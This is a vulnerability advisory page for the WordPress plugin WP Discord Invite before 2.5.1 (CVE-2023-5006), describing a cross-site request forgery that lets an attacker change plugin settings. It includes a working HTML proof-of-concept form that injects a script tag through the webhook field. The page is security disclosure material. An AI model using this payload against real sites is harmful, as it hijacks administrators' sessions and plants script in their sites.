WordPress Plugin Vulnerabilities

WP Discord Invite < 2.5.1 - Arbitrary Settings Update via CSRF

Description

The plugin does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.

Proof of Concept

<html>
	<body>
		<form method="POST" action="http://127.0.0.1/wp-admin/admin.php?page=wp-discord-invite-count">
			<input type="hidden" name="wp-discord-invite-oauth" value="1"/>
			<input type="hidden" name="webhook" value='"><script>alert(1);</script>'/>
			<input type="submit" value="Submit">
		</form>
	</body>
<html>

Affects Plugins

Plugin icon
wp-discord-invite
Fixed in 2.5.1

References

CVE
CVE-2023-5006

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.4 (high)

Miscellaneous

Original Researcher
Enrico Marcolini, Claudio Marchesini
Submitter
Enrico Marcolini, Claudio Marchesini
Submitter website
https://www.dottormarc.it
Submitter twitter
dottormarc
Verified
Yes
WPVDB ID
d29bcc1c-241b-4867-a0c8-4ae5f9d1c8e8

Timeline

Publicly Published
2023-09-26 (about 7 months ago)
Added
2023-09-26 (about 7 months ago)
Last Updated
2023-09-26 (about 7 months ago)

Other

Published
Title
Published
2024-03-29
Title
DX-Watermark <= 1.0.4 - Cross-Site Request Forgery
Published
2021-07-27
Title
uListing < 2.0.6 - Settings Update via CSRF
Published
2021-06-30
Title
WooCommerce Custom Registration Form <= 1.0.4 - Arbitrary Field Deletion and Form Modification via CSRF
Published
2021-04-14
Title
Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)
Published
2022-09-26
Title
WP Page Widget < 4.0 - Settings Update via CSRF